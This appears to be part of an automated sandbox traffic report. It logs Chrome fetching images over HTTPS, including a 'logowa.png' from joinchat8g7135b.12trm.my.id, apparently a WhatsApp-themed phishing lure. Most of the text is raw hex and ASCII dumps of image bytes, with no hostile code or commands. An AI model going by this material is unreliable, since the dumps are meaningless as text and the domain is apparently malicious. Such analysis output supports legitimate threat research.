                          Data Ascii: 2)wphLv%t1>01=L<\g'zGZllCH4K$]NZY;IrBM{N]~uC a,^):Xg/;7X@+YGU{&Q.hrX<ir+J44#ra<v[wo|a0.!<Awiicv<A
                          2024-05-27 22:30:18 UTC1369INData Raw: 89 c7 47 e6 05 c2 4b 1b 22 ee 13 d3 27 a0 f0 1b bd f3 b2 96 d8 17 38 97 d8 97 78 37 7e 3b 81 7d ea f6 9d 9b a8 c6 47 96 bd e2 80 38 11 d0 d5 06 93 60 75 cb 32 8a e4 8e 09 6b 75 64 15 64 6e 34 e6 3e 88 1e 39 32 52 09 71 fc 91 77 fe ec 98 ef 01 31 4f b1 da 4e 03 cf 5f ff 60 6f 15 5b 8e 8f c2 5b 15 6b 8f c4 ea 04 c4 27 7b 0b ff 81 32 1b 18 97 a1 7a f5 f2 8d bb c6 27 27 90 eb d4 97 79 e1 8b 97 6c 37 3c 17 e3 1a d6 d6 07 bd 78 5a ff 13 4b f3 40 ef 52 7c 09 dd 79 06 fb c8 c4 c4 90 64 76 b8 8a d1 db f7 ae 5c 68 56 a5 2d 9e 64 ee 50 92 f8 6f 52 94 73 f3 bc 2b 13 ff bd b6 3b de c8 dd 21 05 fe 2e d4 e4 9e b8 2a 25 00 00 20 00 49 44 41 54 80 d4 83 fa fe 4c 98 ed af ef ef d2 fa 90 6d 66 7b db 0f 3b 92 89 8d 74 03 d5 24 b1 db 94 f9 6e d1 4f e2 b7 2c a5 f1 90 80 57 ee
                          Data Ascii: GK"'8x7~;}G8`u2kuddn4>92Rqw1ON_`o[[k'{2z''yl7<xZK@R|ydv\hV-dPoRs+;!.*% IDATLmf{;t$nO,W
                          2024-05-27 22:30:18 UTC1369INData Raw: bd ca 5c 86 d7 17 46 b5 09 ff f5 fa 9d 2b d7 2a 1b c6 fa 56 f5 0d 75 37 ce f6 2e 44 d4 5f d2 11 f5 80 a8 a7 c0 3d 3f f8 4b bb 80 3c 3c a3 72 f5 f2 9d f5 2f c8 33 d7 79 31 0e cc db a0 5c 02 bd b5 07 be ee 62 9d e1 bd be 64 43 7e 49 40 7f dd 5d 22 f0 6f 87 dd f3 f2 e6 e6 7c 2e 7b 16 ea 24 cc 2d 18 a8 8f dc bf 71 a1 f9 c4 04 46 0e 60 9a dc ab 01 e9 4f 03 ce 5f 49 71 fe ee de a8 23 33 bc fe 88 81 1e 29 cf 7c f4 5b 27 64 6e b3 79 69 1e 23 6a 34 bf cb 74 de 30 72 9f 7d 2e fd 6e 83 d8 75 c9 de 3e 46 27 d8 af 0b 88 af eb e5 f4 f5 44 9b 30 1e 85 da 73 8c 8e 3c 87 7d 62 68 42 8c 73 a3 e0 fa e5 a4 1c 6d 01 25 3f fc 23 ad ec 26 a4 bf 18 72 67 9e 6c 9c e3 98 d4 37 f6 3f 21 6e df b5 d4 33 cf 21 f3 21 8d 72 cb 2b cf 9b 2a a2 83 98 d8 92 36 cb 97 24 7b af db cc 2d 97 49
                          Data Ascii: \F+*Vu7.D_=?K<<r/3y1\bdC~I@]"o|.{$-qF`O_Iq#3)|['dnyi#j4t0r}.nu>F'D0s<}bhBsm%?#&rgl7?!n3!!r+*6${-I
                          2024-05-27 22:30:18 UTC1369INData Raw: 83 f9 7a 2c bc 82 ba 76 07 e2 e8 da f5 fb 5f a4 38 3f a7 8d f6 29 5d 86 5a fc e6 69 bb e9 5c 3d 68 b7 53 5b 88 cf 15 2e e1 3f 70 bb fc b0 44 d2 3a 40 16 04 f6 75 04 33 ba e7 e4 8d 73 c2 2c ac c7 c3 69 a9 5e a6 d4 30 bc d7 db 4d 25 39 d7 c9 54 92 3c da 05 91 8e b2 dc 17 29 d2 bf 2d dd b1 65 b9 7a 6e 54 5c 3f e2 f6 21 91 ba df 90 e3 ae 5d 5a 6a 0a e9 7f d6 48 0f a9 33 bf 34 9f c3 2f ab 41 76 fb 21 2b 70 56 77 0c 3f 8d 71 13 49 ab 3b ce 7b 9d 17 d6 eb 6e c0 ad 2e db 5b 5d f8 f3 7a 55 e5 ea 8d 94 cd 19 e6 2b 16 cc 47 da c1 bc 94 0b 73 77 4a d7 75 7c 73 82 dd 80 3f 60 e6 a5 13 3a f2 bd 04 b8 d6 1f 2c 67 9e 77 51 47 39 61 a7 b9 b3 32 87 87 e3 d5 26 68 27 9d fc 69 7b 06 ba dc 09 e1 4b 59 a8 8f d8 c1 36 be 55 00 f5 45 05 f5 af bf 5d b9 73 59 41 dd 98 51 75 71 df
                          Data Ascii: z,v_8?)]Zi\=hS[.?pD:@u3s,i^0M%9T<)-eznT\?!]ZjH34/Av!+pVw?qI;{n.[]zU+GswJu|s?`:,gwQG9a2&h'i{KY6UE]sYAQuq


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          27192.168.2.44977354.252.28.1724435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:18 UTC368OUTGET /assets/img/loading.gif HTTP/1.1
                          Host: www.starratings.com.au
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:19 UTC350INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Mon, 27 May 2024 22:30:19 GMT
                          Content-Type: image/gif
                          Content-Length: 80553
                          Last-Modified: Thu, 30 Dec 2021 07:01:24 GMT
                          Connection: close
                          ETag: "61cd5944-13aa9"
                          Expires: Thu, 31 Dec 2037 23:55:55 GMT
                          Cache-Control: max-age=315360000
                          Strict-Transport-Security: max-age=31536000;
                          Accept-Ranges: bytes
                          2024-05-27 22:30:19 UTC1050INData Raw: 47 49 46 38 39 61 c8 00 c8 00 f7 00 00 00 00 00 00 84 74 00 84 74 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 01 85 75 01 85 75 01 85 75 00 85 75 00 85 75 00 85 75 00 85 75 02 86 76 03 86 77 05 87 77 06 87 78 07 88 78 07 88 78 06 87 78 07 88 78 08 88 79 08 88 79 09 89 79 0b 8a 7a 0d 8a 7b 0e 8b 7c 0f 8c 7c 10 8c 7d 10 8c 7d 11 8d 7e 13 8e 7f 14 8e 80 15 8f 80 16 8f 81 17 90 81 18 90 82 1a 91 83 1b 91 83 1b 92 84 1c 92 84 1c 92 84 1d 92 84 1f 93 85 21 94 86 23 95 88 25 96 89 27 97 8a 29 98 8b 2a 99 8b 2b 99 8c 2c 99 8c 2d 9a 8d 2e 9a 8d 2f 9b 8e 30 9b 8e 31 9c 8f 33 9d 90 35 9e 91 37 9e 92 38 9f 93 3a a0 94 3b a1 95 3d a1 95 3e a2 96 40 a3 97 42 a4 98 44 a5 99 46 a6 9a 49 a7 9c 4b a9 9d 4f aa 9f 51 ab a0 53 ac
                          Data Ascii: GIF89attuuuuuuuuuuuuuuuuuvwwxxxxxyyyz{||}}~!#%')*+,-./013578:;=>@BDFIKOQS
                          2024-05-27 22:30:19 UTC1400INData Raw: 7b cc f1 9a 7a 6c 30 67 ee fc 79 cc 54 58 a6 4f af 6e dd a5 21 1c da a7 fe 93 e9 ee d2 8d 87 f0 e2 c9 af fc e4 04 bd f6 f1 ea 51 fe 91 e1 5e 7b 99 f8 27 e9 58 a8 6f 1f 7f c9 38 c4 f1 37 dd 7d fe 89 d4 86 80 9b 85 d0 c3 13 5d a8 51 07 1f 82 20 e2 48 26 05 8e 94 06 82 88 95 10 45 1b 89 54 c8 52 18 18 d2 65 43 19 7f 78 e8 d2 16 21 c6 65 42 17 80 98 f8 52 19 29 3a 51 87 8b 30 c9 81 e1 05 56 18 42 23 4c 78 b0 56 5f 09 60 54 b2 23 4c 7e 60 c0 1f 05 58 6c 32 24 4c 87 88 c0 df 0e 2d 2e f9 92 23 2c d4 07 42 1a b6 48 f9 52 2a bc b9 f7 83 22 5a c2 d4 45 7d 58 a4 12 e6 4b 79 b8 f7 c1 1c 67 be 54 09 5c e1 a9 40 48 9b 2f 25 81 9e 0d 8d d0 e9 d2 85 e1 0d a1 89 9e 2d 35 72 41 78 4e a0 02 68 4b 50 84 77 c5 a1 2d f1 11 1e 14 b7 30 ba 92 2c d2 4d b7 04 2b 92 ae c4 27 73 41
                          Data Ascii: {zl0gyTXOn!Q^{'Xo87}]Q H&ETReCx!eBR):Q0VB#LxV_`T#L~`Xl2$L-.#,BHR*"ZE}XKygT\@H/%-5rAxNhKPw-0,M+'sA
                          2024-05-27 22:30:19 UTC1400INData Raw: 26 fd 13 1d fc 22 08 07 6d a4 91 2c d8 00 5a ff 7a 8b 0d 59 5a d2 26 b4 40 55 03 73 a6 02 5b 50 d2 99 14 71 85 59 3a 78 32 17 b8 82 4f f5 04 89 bb 5e 58 32 72 55 e9 a1 2a 01 06 e1 7e 58 2e 23 40 eb ad 30 73 d2 0b eb c0 0c ed f5 55 21 c4 50 03 fc d6 40 0c 88 c0 17 20 bc 60 49 e6 ce c0 0b f5 13 58 21 da 40 85 16 9c f6 05 54 70 83 3b 6b 56 88 37 54 61 07 33 d5 ce 07 7e 50 85 37 1c c2 6c 92 e8 43 1c c8 50 05 b0 ec 80 06 64 19 cd 07 4c f0 82 1a ec 40 08 49 a8 02 27 19 e2 d0 87 87 c1 ed cd 70 8e b3 9c e7 4c e7 3a db f9 ce 78 ce b3 9e f7 cc e7 3e fb f9 cf 80 0e b4 a0 07 7d 97 80 00 00 21 f9 04 09 03 00 c9 00 2c 00 00 00 00 c8 00 c8 00 87 00 00 00 0e 1c 1b 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75
                          Data Ascii: &"m,ZzYZ&@Us[PqY:x2O^X2rU*~X.#@0sU!P@ `IX!@Tp;kV7Ta3~P7lCPdL@I'pL:x>}!,uuuuuuuuuuuu
                          2024-05-27 22:30:19 UTC1400INData Raw: 4a 98 30 45 91 df 07 56 88 82 26 4c 64 c8 b7 01 14 9e bc 09 53 1a c7 6d 67 c1 12 95 d8 09 53 1f ea 15 d1 88 9f 30 8d 92 c2 76 1d a8 41 68 4c 46 6c 57 83 23 8b c2 b4 86 76 15 5c 01 4c a4 2f 29 e2 5b 74 1f e8 81 e9 4b b3 c4 20 dd 0a 85 7d ea 52 15 d2 e9 e0 a2 a9 2d 29 c2 21 72 fe 45 c0 c6 6a 4b 3a 44 a7 e3 ac 2d b1 11 5d 79 b8 b2 24 0a 09 c9 fd 70 69 af 2b 35 91 dc 0e ad 10 bb 52 20 13 20 d7 42 29 ca ae d4 03 72 1d 20 12 ad 4a 7f 24 07 c7 b5 2a 01 81 5c 82 dc a2 84 48 9e b7 e5 30 6c b8 26 35 fa 5b 07 58 a2 6b 52 23 cd fe f6 85 bb 27 39 01 1c 0c e7 d2 2b 12 30 22 00 67 9a be 24 bd 01 5c 10 00 97 e4 ed 6d 11 40 59 b0 48 99 c4 6b 1b c1 0b 8b c4 c5 6f 09 47 2c 12 7e b7 41 6c f1 47 8a 50 ac f0 c6 1e 7d f1 9b 80 20 7f c4 a5 6d 66 94 ec 51 2b 18 dc 86 01 86 2a 73
                          Data Ascii: J0EV&LdSmgS0vAhLFlW#v\L/)[tK }R-)!rEjK:D-]y$pi+5R B)r J$*\H0l&5[XkR#'9+0"g$\m@YHkoG,~AlGP} mfQ+*s
                          2024-05-27 22:30:19 UTC1400INData Raw: 53 40 00 00 21 f9 04 09 03 00 d5 00 2c 00 00 00 00 c8 00 c8 00 87 00 00 00 10 10 10 45 70 6b 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 00 85 75 01 85 76 04 86 77 06 87 78 07 88 78 08 88 79 08 88 78 08 88 79 09 88 79 09 89 79 0b 8a 7a 0e 8b 7c 10 8c 7d 10 8c 7d 10 8c 7d 11 8d 7e 14 8e 7f 15 8e 80 16 8f 80 18 90 82 1a 91 83 1d 92 84 20 94 86 23 95 87 24 96 88 25 96 89 26 97 89 27 97 8a 29 98 8b 2a 99 8b 2b 99 8b 2c 9a 8c 2e 9b 8d 31 9c 8f 34 9d 90 36 9e 92 39 a0 93 3c a1 95 3e a2 96 40 a3 97 43 a5 99 46 a6 9a 49 a7 9c 4c a9
                          Data Ascii: S@!,Epkuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuvwxxyxyyyz|}}}~ #$%&')*+,.1469<>@CFIL
                          2024-05-27 22:30:19 UTC1400INData Raw: dc b8 fc aa c4 2e 70 36 c4 19 30 4a e6 fe 76 c7 c1 29 81 b2 69 6d 53 30 9c d2 19 c0 cd 70 ac c4 24 a1 f9 5b 1b 18 9f c4 07 70 40 08 d3 b1 49 52 00 77 e9 c8 24 6d 42 c2 6f 46 a0 5c d2 18 c0 11 e2 32 49 82 d6 06 c5 cc 23 3d 02 5c 6e 38 87 a4 6c 6d 3e f4 2c 52 7d b5 a5 21 34 48 ae 3c 8c da 0a a5 1c fd 51 1d bf 5d e1 f4 47 7a d2 c6 f3 d4 1c 01 51 5b 0c e9 62 ad 11 2c f9 a2 56 85 d7 1c fd f1 1b 1d 64 6f f4 73 6a 27 b8 92 b6 46 fe a6 76 f3 db 19 0d 51 1b 1a 74 63 04 cb fe ca b4 f9 91 f7 45 89 d4 36 c2 a9 7f 53 a4 47 6d 41 14 6e 91 1b 10 2b 5e 91 a3 b4 99 e1 38 45 b1 d2 76 f2 e4 11 41 51 9b ab 98 47 a4 18 6d 8f 74 1e 91 c6 a9 89 1e d1 89 a8 b9 60 3a 44 a8 9f 66 c3 ea 0f d9 40 5b 0d b0 3b 34 2a 6a b4 d7 ce 10 0d b3 eb ce 90 0c b4 d1 e0 fb 42 31 d0 26 c3 f0 0a 71
                          Data Ascii: .p60Jv)imS0p$[p@IRw$mBoF\2I#=\n8lm>,R}!4H<Q]GzQ[b,Vdosj'FvQtcE6SGmAn+^8EvAQGmt`:Df@[;4*jB1&q
                          2024-05-27 22:30:19 UTC1400INData Raw: 9c 8f 33 9d 90 34 9d 91 36 9e 92 36 9e 92 39 a0 93 3b a1 95 3d a2 96 3f a3 97 41 a4 98 44 a5 99 46 a6 9b 48 a7 9c 4a a8 9c 4c a9 9e 4d a9 9e 4f aa 9f 51 ab a0 53 ac a1 56 ad a3 58 af a4 5a af a5 5b b0 a6 5d b1 a7 5f b2 a8 60 b3 a9 62 b4 aa 65 b5 ab 67 b6 ac 69 b7 ad 6b b8 ae 6d b9 b0 70 ba b1 73 bb b2 75 bc b4 77 bd b5 79 bf b6 7c c0 b8 7f c1 b9 82 c3 bb 84 c3 bc 87 c5 be 8a c6 bf 8c c7 c0 8e c9 c2 90 ca c3 93 cb c4 95 cc c5 97 cd c6 99 ce c7 9a ce c8 9c cf c9 9e d0 ca a0 d1 cb a2 d2 cc a3 d2 cd a3 d3 cd a7 d4 cf aa d6 d1 ad d7 d2 af d8 d3 b0 d9 d4 b2 da d5 b4 db d6 b6 db d7 b8 dc d8 ba de d9 bd df db bf e0 dc c1 e1 dd c3 e2 de c5 e3 df c7 e4 e0 c9 e5 e1 cc e6 e3 ce e7 e4 cf e8 e5 cf e8 e5 d1 e8 e5 d2 e9 e6 d4 ea e7 d7 eb e9 d8 ec ea da ed eb dd ee ec de
                          Data Ascii: 34669;=?ADFHJLMOQSVXZ[]_`begikmpsuwy|
                          2024-05-27 22:30:19 UTC1400INData Raw: 26 1d 6d 1b ce ac 97 b4 b3 6d 65 c4 5e 12 cc aa d1 69 fb 48 80 af e6 f6 ee 20 29 bb 9a d3 c0 87 84 c3 6d a5 14 1f 52 a2 b6 f1 a2 3c 48 34 dc b6 eb f3 1e ed b5 5a 9b d4 77 84 f0 6a d9 7b 64 6e 6a 20 74 df 11 ae ab 89 20 3e 47 b2 36 7f be 46 2e dc 36 d7 fa 18 fd 6b 9b 22 f0 63 84 c4 6d 44 d7 6f 91 c6 ab c9 a1 bf 45 5f 30 dc ff 2a 32 bb d5 5c 61 80 14 91 c3 6d 80 80 c0 89 00 02 37 0d 94 88 25 3e 17 c1 88 7c 2f 35 c1 aa e0 43 ee 67 1b 13 69 d0 21 0d b3 cd ea 3e c8 10 d7 d9 86 15 24 64 c8 22 70 f3 a1 14 2a 84 17 a2 52 0d ec 5c 98 10 2a ad 86 06 34 54 88 17 9a 96 43 84 08 02 37 fe 64 e8 e1 41 78 c1 1e db cc e0 38 42 2c 88 14 70 c3 87 24 16 c4 84 ab 39 99 13 07 52 0a e1 bc 6f 8a d7 68 d7 6d be 80 45 81 64 e9 36 25 d0 44 17 35 21 1c af 75 f1 09 b8 11 41 df a6 18
                          Data Ascii: &mme^iH )mR<H4Zwj{dnj t >G6F.6k"cmDoE_0*2\am7%>|/5Cgi!>$d"p*R\*4TC7dAx8B,p$9RohmEd6%D5!uA
                          2024-05-27 22:30:19 UTC1400INData Raw: e4 f2 f0 e4 f2 f0 e5 f2 f1 e6 f3 f1 e8 f3 f2 e9 f4 f2 ea f4 f3 ea f4 f3 eb f5 f4 eb f5 f4 eb f5 f4 eb f5 f4 ec f5 f4 ed f6 f5 ed f6 f5 ee f6 f5 ee f6 f5 f0 f7 f6 f1 f7 f7 f3 f8 f8 f3 f8 f8 f3 f8 f8 f2 f8 f8 f2 f8 f7 f2 f8 f7 f2 f8 f8 f3 f9 f8 f4 f9 f8 f4 f9 f9 f5 fa f9 f6 fa fa f6 fa fa f7 fb fa f7 fb fa f7 fb fa f8 fb fb f9 fc fb f9 fc fb fa fc fb fa fc fb fb fd fc fb fd fc fc fd fc fc fd fc fc fd fc fd fe fd fd fe fd fd fe fd fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe ff fe fe fe fe fe fe fe fe fe fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe fe ff fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                          Data Ascii:
                          2024-05-27 22:30:19 UTC1400INData Raw: b5 69 83 15 2f 62 b6 d4 50 61 8b 16 f1 1b 6d 66 00 c6 8a 0c af 36 84 28 e3 44 52 01 1c 34 a8 71 22 05 4c 8d 13 de 28 11 b9 a5 46 05 40 a3 63 43 ec 00 1c fc e9 d1 21 b7 98 22 6d 82 f0 c7 87 34 01 38 02 2c 24 43 d2 00 1c 2c 28 92 21 89 ab 8d 0a 8a f3 c8 84 a8 f0 87 95 54 c8 18 80 73 82 a4 65 72 20 93 00 21 6a aa f7 c9 83 1c b2 36 9d 2c a5 41 e6 10 9c 2a a8 b2 20 ba 28 61 6d 8a f7 4a 81 78 21 38 3b 58 5e 29 0f b1 b5 5a 0e c4 79 b5 09 c1 8d 7c 49 b5 e0 f8 a0 30 be e4 4f 70 e6 e8 cb 42 88 32 35 8e f2 65 9e 82 e3 01 6d bd 32 11 cc 79 01 5d 6a 69 47 e0 d8 40 4c af 5c 45 be 96 d3 03 4a 96 f2 75 cc 11 02 32 55 79 ca e5 1c 21 16 af 8c 44 06 83 63 84 75 7e d2 0c d7 fe f9 c1 24 5e 09 c0 e5 e4 60 9b 4a e1 5c 5d 04 11 28 eb c4 c0 74 49 e1 c3 0c c6 80 23 f0 a4 40 0d 48
                          Data Ascii: i/bPamf6(DR4q"L(F@cC!"m48,$C,(!Tser !j6,A* (amJx!8;X^)Zy|I0OpB25em2y]jiG@L\EJu2Uy!Dcu~$^`J\](tI#@H


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          28192.168.2.449774188.114.97.34435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:20 UTC380OUTGET /vhsfhqpdhdsih6/img/logowa.png HTTP/1.1
                          Host: joinchat8g7135b.12trm.my.id
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:20 UTC680INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:20 GMT
                          Content-Type: image/png
                          Content-Length: 152291
                          Connection: close
                          Last-Modified: Thu, 25 Aug 2022 04:39:28 GMT
                          Cache-Control: max-age=14400
                          CF-Cache-Status: HIT
                          Age: 3335
                          Accept-Ranges: bytes
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wF9bD%2Fv7XzdKBO%2FXX70ju8qeqDJk45FthpQDNH1iXrMmDHGct9m6gdKvQ6iQLTd9lIfMX7OZnQwkkRRvcU%2FK%2B5tBY%2FrzYWHKKIjeHK6aNNU0gc43VIF5GNuMGf9li81hbtILgvrEOanbQV0NZpM%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972e9a9e843f8-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:20 UTC689INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 e8 00 00 03 e8 08 03 00 00 00 7a 7d 24 d6 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 00 50 4c 54 45 00 00 00 03 03 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 03 03 03 04 04 04 04 04 04 00 00 00 00 00 00 06 06 06 00 00 00 16 16 16 fd fd fd 78 78 78 54 54 54 3f 3f 3f 67 67 67 f4 f4 f4 88 88 88 e8 e8 e8 f0 f0 f0 f6 f6 f6 fa fa fa 32 32 32 ed ed ed df df df e4 e4 e4 f7 f7 f7 d9 d9 d9 99 99 99 92 92 92 a7 a7 a7 c3 c3 c3 f9 f9 f9 d8 d8 d8 a9 a9 a9 cd cd cd c9 c9 c9 ba ba ba cf cf cf bf bf bf b0 b0 b0 ba ba ba c6 d2 c6 fd fd fd fd fd fd ff ff ff fc fc fc f9 f9 f9 f8 f8 f8 f7 f7 f7 f5 f5 f5 ed ed
                          Data Ascii: PNGIHDRz}$gAMAasRGBPLTExxxTTT???ggg222
                          2024-05-27 22:30:20 UTC1369INData Raw: af 17 29 a8 16 1b 9c 0b ed ee ee 2a ac 16 21 a1 10 22 a5 11 17 99 08 09 8b 01 27 aa 14 1b a1 0e e3 f4 e2 13 95 05 ec f7 eb da f0 d8 0d 8e 02 f5 f5 f5 cf ec cc 35 b4 24 01 93 00 c4 e7 c1 f2 f9 f1 f6 fb f5 f9 fc f9 b8 e2 b5 0f 92 04 ad dd aa a0 d8 9c 95 d3 90 0e 9c 0a 52 bc 44 48 ba 36 7b ce 72 49 a9 48 6d c9 61 89 d3 7f 59 b3 58 5f c4 51 2f 9c 2d 78 c1 77 3d ae 35 68 ba 67 24 94 24 3b 9f 3a 87 c9 86 20 9e 0e 12 88 12 19 8e 19 0a 83 0a f7 f6 f6 c4 bf 2f 5f 00 00 00 35 74 52 4e 53 00 30 1d 08 04 0f 19 06 02 13 27 0c 2b 3a 35 40 22 20 47 24 53 fa 79 67 46 53 e9 63 d5 e3 ee f7 54 dc c6 ce f1 bf 92 79 7a b2 f5 b2 90 ba 9a a9 a8 94 a1 87 d4 58 ce d3 29 00 00 20 00 49 44 41 54 78 da ec bd 4b 68 5c 47 da 3e fe 4b e6 9b cb 97 f1 64 92 c9 c8 ce 38 be c4 b7 38 71 ec
                          Data Ascii: )*!"'5$RDH6{rIHmaYX_Q/-xw=5hg$$;: /_5tRNS0'+:5@" G$SygFScTyzX) IDATxKh\G>Kd88q
                          2024-05-27 22:30:20 UTC1369INData Raw: 5a 4a 7f 67 c9 7c 38 5b e9 3a b8 67 f7 7e 05 f7 37 11 ee 8a dc 99 db b5 21 2f e2 6f e1 71 87 12 98 5c 81 dc d8 ea 64 aa 6f 3f fa fe a1 7d 07 d9 30 97 76 b9 20 6d 06 37 b0 ef 59 82 31 da e5 67 d9 59 d7 db 74 57 f4 ea ca 59 83 61 b6 d5 c1 40 67 a5 ee 2c be 9c 3d 5b e1 0e a3 9b 0f d7 7d 16 e9 5e 2d ed da 79 e0 d8 87 87 99 dc 01 ed ca 6f 57 d4 2e c1 fe db 00 f6 50 9e 47 98 b3 4f 0e 4c 6e 19 eb c0 e3 db 8f 1e db a5 5c f1 6e 0e 7f 69 6e ed 66 70 da f0 15 74 5c 71 0a bb e3 0e 37 eb cf dd ee be 67 ed 6d bb b9 33 30 e6 02 ba f5 15 7a ef 8e 53 e7 7d bf 72 dd 25 da 5f 63 6a 47 b0 07 ac 87 f2 3c 82 fc b7 28 bc 31 93 93 e8 96 82 fc 4f 3b 8e be 7f 60 77 17 84 b4 b5 1d ad 69 d7 28 6c 67 c1 f6 a6 50 9a 61 76 32 b8 49 2f 37 18 3e 9b ed 25 2a 4e 9f a0 37 39 db 9d 59 d9 6d
                          Data Ascii: ZJg|8[:g~7!/oq\do?}0v m7Y1gYtWYa@g,=[}^-yoW.PGOLn\ninfpt\q7gm30zS}r%_cjG<(1O;`wi(lgPav2I/7>%*N79Ym
                          2024-05-27 22:30:20 UTC1369INData Raw: dd 5b 8f 91 ea a3 85 57 35 ef b8 d5 5f 5c 02 8c 04 ad bf 12 9c f5 50 7e 11 36 37 36 3b 91 f9 b1 bd 39 b0 70 81 51 de 7a f6 6c b7 45 79 f3 28 fd 65 95 fd b3 fb 0c ad 1b 0b 3e 40 3d 94 c7 c5 e6 36 cc df 3c ba ff e0 43 f9 a4 06 4f d5 ad 40 5b 75 a3 07 d8 98 c3 51 ce ad b5 ba 99 53 2f b7 3a 78 ea ad 33 d4 2d 67 3d 40 3d 94 c7 c7 e6 ca 66 ff c3 1f df 78 7f 4f 4b b4 45 9d 22 b3 bc 25 a0 dd 64 77 50 dd 5a 82 af 76 b8 75 fe 26 d5 aa 0e b8 c1 3c 15 7f e0 d0 3a 58 f0 81 d5 43 79 5c 42 3b c1 5c 0f 4c ab e6 34 df 72 d6 7e af 0a f6 2a 6f 09 60 ab 9b 97 00 fc e7 ad 57 54 37 d4 df 54 ab be 13 ab 56 3b e8 64 aa 7e 8f 27 fd b0 97 2c f8 17 5e 78 e9 b5 57 81 d5 7f 1f 58 3d 94 c7 20 b4 6b d7 fc e8 ae 98 1a 63 79 2b f9 70 13 e4 5a dd b8 f1 dd c1 29 57 1f 75 d0 bc e5 1e 62 df
                          Data Ascii: [W5_\P~676;9pQzlEy(e>@=6<CO@[uQS/:x3-g=@=fxOKE"%dwPZvu&<:XCy\B;\L4r~*o`WT7TV;d~',^xWX= kcy+pZ)Wub
                          2024-05-27 22:30:20 UTC1369INData Raw: 4c a6 0a dc 8f 72 99 8c 16 bc c6 32 75 45 70 d9 11 fb 03 78 2f d9 1b c1 1b 8e b7 21 3d 87 a8 8c 77 9d 5c 84 f4 6d cf 31 8e ab bf 1a c6 ab 87 b2 71 ab 5d b1 f9 6f 00 e6 af 1f 55 01 b5 32 a2 ba 5a 46 db 9d 69 ae 4a 9c 8e 90 60 bf 18 db 2a e0 09 90 18 29 6c 44 f4 3d 42 9a 45 b3 1f bd dc 32 45 eb 94 51 4f a8 60 a0 83 00 10 31 87 e9 4e a0 4c 7f 55 aa 28 c2 57 72 af 11 d5 e8 68 54 98 b3 ab cc fa 74 fe b0 59 99 78 bd 4a a7 08 bd 82 22 5b 3c 75 36 24 22 30 0b d8 1a 41 50 aa ab a8 f2 e5 56 d0 9e 81 ea d0 12 40 b8 93 a3 83 b6 44 99 4e 91 eb 52 d7 00 37 94 ae 5e 99 46 b8 ad ea 10 54 02 5f 84 14 0e dd 01 9c 75 19 8d 2a 55 35 74 40 e9 09 1c 79 97 59 fd d5 17 43 ac 2d 94 0d 45 d4 50 83 53 43 57 fe a8 b2 e0 c8 3a 87 37 8d 6a 60 a8 08 ff ab f6 59 45 b4 69 d8 a1 8d 1c b1
                          Data Ascii: Lr2uEpx/!=w\m1q]oU2ZFiJ`*)lD=BE2EQO`1NLU(WrhTtYxJ"[<u6$"0APV@DNR7^FT_u*U5t@yYC-EPSCW:7j`YEi
